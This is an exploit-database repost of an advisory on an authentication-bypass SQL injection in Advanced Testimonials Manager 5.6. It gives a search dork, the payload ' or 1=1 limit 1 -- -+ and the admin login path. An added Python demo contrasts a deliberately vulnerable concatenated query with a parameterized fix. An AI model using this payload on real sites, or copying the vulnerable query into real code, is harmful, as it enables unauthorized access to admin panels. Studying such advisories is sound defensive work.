Advanced Testimonials Manager 5.6 SQL Injection

CVE: CVE-2020-25339
Category: CWE-89
Price: Unknown
Severity: High
Author: EgiX
Risk: High
Exploitation Type: Remote
Date: 2022-07-05
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022070012

Below is a copy:

Advanced Testimonials Manager 5.6 SQL Injection
====================================================================================================================================
| # Title     : Advanced Testimonials Manager v5.6 Auth Bypass Vulnerability                                                       |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             |
| # Vendor    : https://codecanyon.net/item/advanced-testimonials-manager/113257?s_rank=194                                        |  
| # Dork      : Advanced Testimonial Manager                                                                                       |
====================================================================================================================================

poc :


[+] Dorking in Google or other search engine.

[+] Use payload : user & pass = ' or 1=1 limit 1 -- -+

[+] http://127.0.0.1/testimonials/admin/index.php

==Greetings to :=========================================================================================================================
|                                                                                                                                       |
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* thelastvvv *Zigoo.eg * moncet              |
|                                                                                                                                       |
=========================================================================================================================================
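
Why the payload in the PoC gets past a login form, and the corrected query, as an added example that is not from the advisory or the vendor's code. The table, column and function names are hypothetical, SQLite stands in for the application's database, and the fixed salt exists only so both functions can share one stored hash.

```python
import hashlib
import sqlite3

# The value the advisory supplies for both the user and pass fields.
PAYLOAD = "' or 1=1 limit 1 -- -+"
DEMO_SALT = b"constructed-demo-salt"  # fixed only for this demo; use per-user salts in production


def digest(password):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), DEMO_SALT, 100_000).hex()


def make_db():
    """Constructed sample data in a hypothetical `admins` table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (id INTEGER PRIMARY KEY, username TEXT UNIQUE, pw_hash TEXT)")
    db.execute("INSERT INTO admins (username, pw_hash) VALUES (?, ?)",
               ("admin", digest("S3cure-demo-pass")))
    return db


def login_concatenated(db, user, password):
    """Vulnerable pattern (CWE-89): input is pasted into the SQL text."""
    # With PAYLOAD as `user`, the quote closes the string, `or 1=1` matches every
    # row, and `--` comments out the password condition that follows.
    sql = ("SELECT id FROM admins WHERE username = '" + user +
           "' AND pw_hash = '" + digest(password) + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(db, user, password):
    """Hardened form: values are bound, so quotes and comment markers stay data."""
    row = db.execute("SELECT id FROM admins WHERE username = ? AND pw_hash = ?",
                     (user, digest(password))).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("concatenated, valid login :", login_concatenated(db, "admin", "S3cure-demo-pass"))
    print("concatenated, payload     :", login_concatenated(db, PAYLOAD, PAYLOAD))
    print("parameterized, valid login:", login_parameterized(db, "admin", "S3cure-demo-pass"))
    print("parameterized, payload    :", login_parameterized(db, PAYLOAD, PAYLOAD))
```

The same binding applies in the application's own database layer (prepared statements with placeholders); escaping or filtering the quote character is not an equivalent fix.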
